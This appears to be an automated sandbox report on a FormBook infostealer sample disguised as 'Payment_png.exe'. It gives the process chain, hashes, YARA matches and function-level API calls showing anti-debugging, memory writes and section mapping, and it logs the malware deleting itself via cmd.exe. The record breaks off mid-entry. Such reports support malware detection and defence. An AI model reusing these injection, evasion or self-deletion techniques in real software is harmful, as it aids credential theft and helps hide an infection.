Imagebase:	0x400000
File size:	98304 bytes
MD5 hash:	86FA26E33879D3C04152301EAAABA518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: Payment_png.exe PID: 3112 Parent PID: 6076

General

Start time:	13:58:18
Start date:	29/03/2021
Path:	C:\Users\user\Desktop\Payment_png.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Payment_png.exe'
Imagebase:	0x400000
File size:	98304 bytes
MD5 hash:	86FA26E33879D3C04152301EAAABA518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 3112

General

Start time:	13:58:32
Start date:	29/03/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: colorcpl.exe PID: 2988 Parent PID: 3388

General

Start time:	13:58:43
Start date:	29/03/2021
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\colorcpl.exe
Imagebase:	0xe70000
File size:	86528 bytes
MD5 hash:	746F3B5E7652EA0766BA10414D317981
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1536 Parent PID: 2988

General

Start time:	13:58:50
Start date:	29/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Payment_png.exe'
Imagebase:	0xf20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1560 Parent PID: 1536

General

Start time:	13:58:50
Start date:	29/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Payment_png.exe PID: 6076 Parent PID: 5584 Payment_png.exeCOMMON

Executed Functions

Function 02221986, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

1.!T, xrefs: 02220513

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 0451731e5b9829575761e33d1cfc521e0827a820253f233ff01925d74591d340
Instruction ID: 89b47de60f062080e2abcd98dad071923632a5aece310b15e256207cb45d912b
Opcode Fuzzy Hash: 0451731e5b9829575761e33d1cfc521e0827a820253f233ff01925d74591d340
Instruction Fuzzy Hash: F5D1BDB0260315BFEB249F90CD45BE93662BF14704F508224FE49AB2D9C7FB9898CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02220438, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0222047D,?,00000000,?,?,?,?,?,?,?,02220157), ref: 0222043E
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0222052B

Strings

1.!T, xrefs: 02220513

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: 49c3966c376780a41a6554515558d3bf4244a617f50d7bb6c586592e29405516
Instruction ID: de5fef85685a41416c4f8a030f85ef9eaf514f838e1a87ef027d84c9d393d8cd
Opcode Fuzzy Hash: 49c3966c376780a41a6554515558d3bf4244a617f50d7bb6c586592e29405516
Instruction Fuzzy Hash: 5D213670764324BBEB14AFA08C40BE93792AB55714F208219BC16AB2C8C6B6DD4DCB51

Uniqueness

Uniqueness Score: -1.00%

Function 02220604, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON

Download Yara Rule

Strings

W.E, xrefs: 022230FF

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: W.E
API String ID: 1029625771-3845452836
Opcode ID: 6f7154d6e79c2132ccdf066be8d3d92220103a32f3920fb50b5fb2fc5e14e9ed
Instruction ID: 9125ac1b8b751735c6e24c0c2a05fbf988a4ca88b194e3dd729cd18578aeaa2a
Opcode Fuzzy Hash: 6f7154d6e79c2132ccdf066be8d3d92220103a32f3920fb50b5fb2fc5e14e9ed
Instruction Fuzzy Hash: 78E1FC31A243B6BADB31AFF08C45BE93762AF12314F18015ADC45AB19DC77BC58DCA02

Uniqueness

Uniqueness Score: -1.00%

Function 02222992, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

1.!T, xrefs: 02220513

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: c8f63790c40bba7a46ed6e6f55ba6a2113cdb2cbda04f738a6d40322a2aeccff
Instruction ID: b152e745a43d2c257141e37f8e22b96f34225bc510f085678494c1a5aa32f43d
Opcode Fuzzy Hash: c8f63790c40bba7a46ed6e6f55ba6a2113cdb2cbda04f738a6d40322a2aeccff
Instruction Fuzzy Hash: CB51A27066436AFBEF349FA0CD45BEA3766AF04740F108215BD0A6A1C8D7B7994CDB21

Uniqueness

Uniqueness Score: -1.00%

Function 022204AF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0222052B

Strings

1.!T, xrefs: 02220513

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: fd47d5b67a073711ca496cde7002e8b5a4e957ade40e168dd8a08c6c517e0a30
Instruction ID: a39fff52e076826aa96a2069184a29fe60b7f79f290342056840971133b2465b
Opcode Fuzzy Hash: fd47d5b67a073711ca496cde7002e8b5a4e957ade40e168dd8a08c6c517e0a30
Instruction Fuzzy Hash: AE1126B1B64324BBEB256F908C45BE83B65EF04768F140650BD126F1DCD2E2AC8DCE91

Uniqueness

Uniqueness Score: -1.00%

Function 022204D5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0222052B

Strings

1.!T, xrefs: 02220513

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 9a8851c3fc1c974ec95b858a7c63c64eb388ac821d8000531ab636ecd2d990aa
Instruction ID: fe79c289df8de8e04aa34299cea5162d84d84092fc87e404878d48f47f0fb5b2
Opcode Fuzzy Hash: 9a8851c3fc1c974ec95b858a7c63c64eb388ac821d8000531ab636ecd2d990aa
Instruction Fuzzy Hash: 4A1126B1B64324BBEB156F908C45BD83B25EF04758F104650BC126F1ECD2A2AC8DCE91

Uniqueness

Uniqueness Score: -1.00%

Function 022228D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,02222717,?,02220DA3,00000000,?), ref: 02222F9F

Strings

advapi32, xrefs: 02222FFE

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: advapi32
API String ID: 2994545307-1865859864
Opcode ID: d9b38367a2f8cb59c294eb9e2a8f1ee3394a759b78f91a905bf4e3279537e3cc
Instruction ID: 5758ac6d4333f6087a77e4030cdaf17264485e24ad50d0bbc99de223c2d40449
Opcode Fuzzy Hash: d9b38367a2f8cb59c294eb9e2a8f1ee3394a759b78f91a905bf4e3279537e3cc
Instruction Fuzzy Hash: D8F0C0361602B2ABC301AAFC080152E7B00DB51230B08D7858870471EDCF07970FE7E0

Uniqueness

Uniqueness Score: -1.00%

Function 02220F83, Relevance: 3.4, APIs: 2, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f497b798fbf14074d8db185457171589839b220d53d80f0fa090a73f51aa2f61
Instruction ID: c0fc84c6166bd7d2d9cb1693e3e9a243df6f6069276a50ee5acb89a23715316f
Opcode Fuzzy Hash: f497b798fbf14074d8db185457171589839b220d53d80f0fa090a73f51aa2f61
Instruction Fuzzy Hash: 92D11570260366BFEB259FA0CC45BE93A62BF01300F548259FD446B1E9C7BB949CCB45

Uniqueness

Uniqueness Score: -1.00%

Function 02221369, Relevance: 2.0, APIs: 1, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9a8473363c13d6fef9e6698b4e0157aeef080f50a4f997b522fb886db6c58c94
Instruction ID: 6e215e2aa9dff4c4e7a4296a525d3e52b0d33ccf0d05f907fb7f21e1f5098667
Opcode Fuzzy Hash: 9a8473363c13d6fef9e6698b4e0157aeef080f50a4f997b522fb886db6c58c94
Instruction Fuzzy Hash: BA120871710316BFEB249FA8CC81FE577A5FF04304F544229ED4997285CBB6A8A8CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02221AB4, Relevance: 1.8, APIs: 1, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f38a6d9c0b697a16e3bb1267de2fdbd139d7e59fe98f938a7ece3140dd7367f7
Instruction ID: 43fe1a78110651c891aa09e828f8ee4c45e181845dcb6b90ecde458c0ad8cc8a
Opcode Fuzzy Hash: f38a6d9c0b697a16e3bb1267de2fdbd139d7e59fe98f938a7ece3140dd7367f7
Instruction Fuzzy Hash: 6E81DFB0250316BFEB259F90CD45BE93662FB15704F608224FE44AB2D8C7FB9898CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02221DEB, Relevance: 1.7, APIs: 1, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6903b349ed67ad930caf6e3c300500e8933d4298a60de8a001350912c8c1934
Instruction ID: 8ba9b1fc18d34b08c3cc13b6189cd0172d2838747530e9e34806f59db7fc19ea
Opcode Fuzzy Hash: e6903b349ed67ad930caf6e3c300500e8933d4298a60de8a001350912c8c1934
Instruction Fuzzy Hash: 8C71F1B021031ABFEB255F90CC45BE97662FF15304F908224ED45AB2A8C7FB98DC8B51

Uniqueness

Uniqueness Score: -1.00%

Function 02221E27, Relevance: 1.7, APIs: 1, Instructions: 215nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02223CB3: LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0222052B
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: InformationLibraryLoadMemoryThreadVirtualWrite
String ID:
API String ID: 3170465491-0
Opcode ID: 991b130f28fe9b50051e17312e417fc9faefa1a7cd62635c515826ebea8e547c
Instruction ID: ddbc8508f04d86b20f49b2229adecf149293a0b2f3635ec7ced004c6e5be77b4
Opcode Fuzzy Hash: 991b130f28fe9b50051e17312e417fc9faefa1a7cd62635c515826ebea8e547c
Instruction Fuzzy Hash: 5E71FEB1210206BFEB255F90CC45BE97A62FF15304F908224ED459B2A9C7FB98DC8B41

Uniqueness

Uniqueness Score: -1.00%

Function 02221E81, Relevance: 1.7, APIs: 1, Instructions: 199nativelibrarythreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0222052B
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD
LoadLibraryA.KERNELBASE(0000C961,00000000,?,022225E4,?), ref: 02223D7E

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: InformationLibraryLoadMemoryThreadVirtualWrite
String ID:
API String ID: 3170465491-0
Opcode ID: eb8257504efb76d7b7cd55d583bc05ea72424ee10d9d6cbb982922aeea73593a
Instruction ID: 2205366e9150dbee75e0a5f7c12ac2637b3906193c026b1f518d5f336a195af0
Opcode Fuzzy Hash: eb8257504efb76d7b7cd55d583bc05ea72424ee10d9d6cbb982922aeea73593a
Instruction Fuzzy Hash: 4571D2B1210206BFEB655F90CC45BE97A22FF15304F948624ED459B2A8C7FB98DCCB51

Uniqueness

Uniqueness Score: -1.00%

Function 02221F21, Relevance: 1.7, APIs: 1, Instructions: 168nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d355ff0a6c39ed0763a1549574b1f856979e705e9668d4faa6aaa4a0b6cee062
Instruction ID: 2f162f23294bf60ea16d49d87b7adceae8d2d565a5fb576207de7588e20e9889
Opcode Fuzzy Hash: d355ff0a6c39ed0763a1549574b1f856979e705e9668d4faa6aaa4a0b6cee062
Instruction Fuzzy Hash: 2551CEB1210209BFEB794F80CC85BE93A22FB05304F948224ED459B1A8C7F798DC8B91

Uniqueness

Uniqueness Score: -1.00%

Function 02221F93, Relevance: 1.6, APIs: 1, Instructions: 148nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a35b8aade5ab3ed3cf34a25c18af8b8c2de6767798153be6f8d50745b68036a3
Instruction ID: cda6eb140ba37627c7ccf9ce8339fdbbec809146f6cbf87bd885e5cd3ee9643d
Opcode Fuzzy Hash: a35b8aade5ab3ed3cf34a25c18af8b8c2de6767798153be6f8d50745b68036a3
Instruction Fuzzy Hash: CC51CB70210249BFEF795F80CC85BE93A22EB05304F949224FE859A1A8C7F798DC9B51

Uniqueness

Uniqueness Score: -1.00%

Function 02222033, Relevance: 1.6, APIs: 1, Instructions: 114nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 40def742401e7d129976b31f6e499247f067547d7abf8fc9105d549d575f054d
Instruction ID: ec6156a6f501481d7dee18110bebefe06959ce444e6675c9d9ecbdf018dda210
Opcode Fuzzy Hash: 40def742401e7d129976b31f6e499247f067547d7abf8fc9105d549d575f054d
Instruction Fuzzy Hash: 6F41EFB0210209FFEB7A5F80CC85BE87A22FB04304F549624ED459A1A8D7F798DCCB91

Uniqueness

Uniqueness Score: -1.00%

Function 02225301, Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: f6c9fbf1827dc7809b79d0c9b1e49fde2feef98683a6230fbb5b42e4da9bcf2f
Instruction ID: 9a6a47267f6acee6472621d06ad780972e5cda59a9b7df2de8c6074329eb70b0
Opcode Fuzzy Hash: f6c9fbf1827dc7809b79d0c9b1e49fde2feef98683a6230fbb5b42e4da9bcf2f
Instruction Fuzzy Hash: EF41BF72A25611EFDB3E5B90C4083A4B776EF05220F98D955E4128E87DE3A648EDCF81

Uniqueness

Uniqueness Score: -1.00%

Function 022220A1, Relevance: 1.6, APIs: 1, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 98d294e26f9492e74a5e3267597a0f08c536bab712ea0e14d0bbcd43e0424e0f
Instruction ID: 2c0c62febbf3d9c36cb0a7d016e6a062daf2207042bb48b82ed9198244dab1c0
Opcode Fuzzy Hash: 98d294e26f9492e74a5e3267597a0f08c536bab712ea0e14d0bbcd43e0424e0f
Instruction Fuzzy Hash: B631BE70610215FFEB7A5F90CC88BE87B22FF04304F949624ED458A168DBB798DD8B91

Uniqueness

Uniqueness Score: -1.00%

Function 02225331, Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: d8fef80556874876aa40b93336467eaaa7f48fca0f40d7260a13ef9c5ceac0f3
Instruction ID: 601109718fef54d8ddb2d8182e12c8c70c6f6a1d7d0eb8ae78e28b2e15d10e96
Opcode Fuzzy Hash: d8fef80556874876aa40b93336467eaaa7f48fca0f40d7260a13ef9c5ceac0f3
Instruction Fuzzy Hash: D731F730630226EFEF3D4EA4C5447A472A7AF44314FD5D22AE5428A4A8D3BB84BCC741

Uniqueness

Uniqueness Score: -1.00%

Function 02225338, Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: f4607a12b42a9464a7c53c4b818b202fd954323f4031d05ed026ffa1a46b80ee
Instruction ID: 3f72e5fbd130433e3cb43671489d2af771dd93d3e4c70e3ba7e1d0835a599550
Opcode Fuzzy Hash: f4607a12b42a9464a7c53c4b818b202fd954323f4031d05ed026ffa1a46b80ee
Instruction Fuzzy Hash: 7031AE31A34515EFDB3D5A90C4087A4B7A6EF45320FC9D555E5028A86CE3BA88FCCB81

Uniqueness

Uniqueness Score: -1.00%

Function 02225380, Relevance: 1.6, APIs: 1, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 7e1177e6ede29ca131f9488bc93f0bfecad8e72540acb91741375643f59b99a5
Instruction ID: b2b347a7872d86d57cdb559d4d46f8407f1e301be48ec56b7d01b12251d20796
Opcode Fuzzy Hash: 7e1177e6ede29ca131f9488bc93f0bfecad8e72540acb91741375643f59b99a5
Instruction Fuzzy Hash: B5219C31A21515EFDB2D5B90C4087A4B766EF05320FC9D555E4128A47CD3BA88FCCB81

Uniqueness

Uniqueness Score: -1.00%

Function 022253B4, Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: ecd64982b08d653b73acdbe1676eff051c6c0d2884503ac9c9e9cfa10beb5037
Instruction ID: e9573a396ef21ff0217441056dcae8b3fc7d060ec8e28b61e925037876047900
Opcode Fuzzy Hash: ecd64982b08d653b73acdbe1676eff051c6c0d2884503ac9c9e9cfa10beb5037
Instruction Fuzzy Hash: EB21A031A20512EFDB3D4B90C4087A4B766EF05324FC9D555E4428A87CE37A88FCCB81

Uniqueness

Uniqueness Score: -1.00%

Function 022253EF, Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: bd7d1970afd26ff3fccc9ec9382509d38d09ecbdc1a4235a65eae98ad5b38af5
Instruction ID: 80ef5e3c30f91fadc720627e20918d4793244de5c8c07a96f869a14eff35f081
Opcode Fuzzy Hash: bd7d1970afd26ff3fccc9ec9382509d38d09ecbdc1a4235a65eae98ad5b38af5
Instruction Fuzzy Hash: B621AF71624212EFDB2D5B90C4087A477A6EF01325FC8D555E5524B4BDD37A88FCCB81

Uniqueness

Uniqueness Score: -1.00%

Function 0222542F, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 9036a4e00e09656e47e41850daca867e6a8e874f474f2b7fb571fdaa20066f31
Instruction ID: e167eb1260d109dfa4042ecec5db502e0b939decb4771f3a5c157684ecf8a3be
Opcode Fuzzy Hash: 9036a4e00e09656e47e41850daca867e6a8e874f474f2b7fb571fdaa20066f31
Instruction Fuzzy Hash: 52218E31A25616EFDB3D5B90C0087A477A6EF01324FD9D545E4524A87DD3BA84FCCB42

Uniqueness

Uniqueness Score: -1.00%

Function 02222183, Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,022227C8,00000000,?), ref: 022221AD

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 0ab93e941691201cefcd9db0e28dd1ea3095d0eaba0abac1601412225a1cbdbe
Instruction ID: 3eddaa458ea85c67d4eac715462720cfb51d51f41b9fcfca3504d0df2806a695
Opcode Fuzzy Hash: 0ab93e941691201cefcd9db0e28dd1ea3095d0eaba0abac1601412225a1cbdbe
Instruction Fuzzy Hash: 3B11AC70610205EFDB6A5F50CC84BE87B32FF05344F849620ED458A069DBB348ED8F91

Uniqueness

Uniqueness Score: -1.00%

Function 022254CB, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 2d1db78a1d81a22e62bf1ecc27a5fcafff1873da463394e805917fcfe0571859
Instruction ID: b69184a3951ba6fc4f5c247e5d9b3c26e240f441ea4bb7b9eaa3d9c4c0bb9e60
Opcode Fuzzy Hash: 2d1db78a1d81a22e62bf1ecc27a5fcafff1873da463394e805917fcfe0571859
Instruction Fuzzy Hash: 19F06231B25152EF872E5B94C01C1E4777AED065143CCD84098528A83CF36208FDCB81

Uniqueness

Uniqueness Score: -1.00%

Function 022254F5, Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000004), ref: 02225572

Memory Dump Source

Source File: 00000000.00000002.247315010.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: ae0c7b2873d4c2a24705e35a72a99c03c93b170a1e5d9b1cadcaa9f9feaf0afe
Instruction ID: af734a51778ead6ff39aa6df914af07c5301ecb2e51064273eb123b2c80ef95e
Opcode Fuzzy Hash: ae0c7b2873d4c2a24705e35a72a99c03c93b170a1e5d9b1cadcaa9f9feaf0afe
